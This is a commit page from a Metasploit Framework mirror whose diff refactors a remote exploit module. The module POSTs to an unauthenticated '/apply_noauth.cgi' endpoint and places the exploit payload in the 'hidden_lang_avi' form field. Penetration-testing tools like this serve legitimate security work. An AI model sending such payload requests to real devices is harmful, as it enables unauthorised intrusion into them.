1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00

Fix uri_str for exploit

This commit is contained in:
William Vu 2017-05-11 16:30:10 -05:00
parent bee36ca90f
commit 231510051c

View File

@ -174,11 +174,12 @@ class MetasploitModule < Msf::Exploit::Remote
def send_req(timestamp)
begin
uri_str = (timestamp == nil ? \
"/apply_noauth.cgi?/lang_check.html" : \
"/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}")
query_str = (timestamp == nil ? \
'/lang_check.html' : \
"/lang_check.html%20timestamp=#{timestamp.to_s}")
res = send_request_raw({
'uri' => uri_str,
'uri' => '/apply_noauth.cgi',
'query' => query_str,
'method' => 'POST',
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}"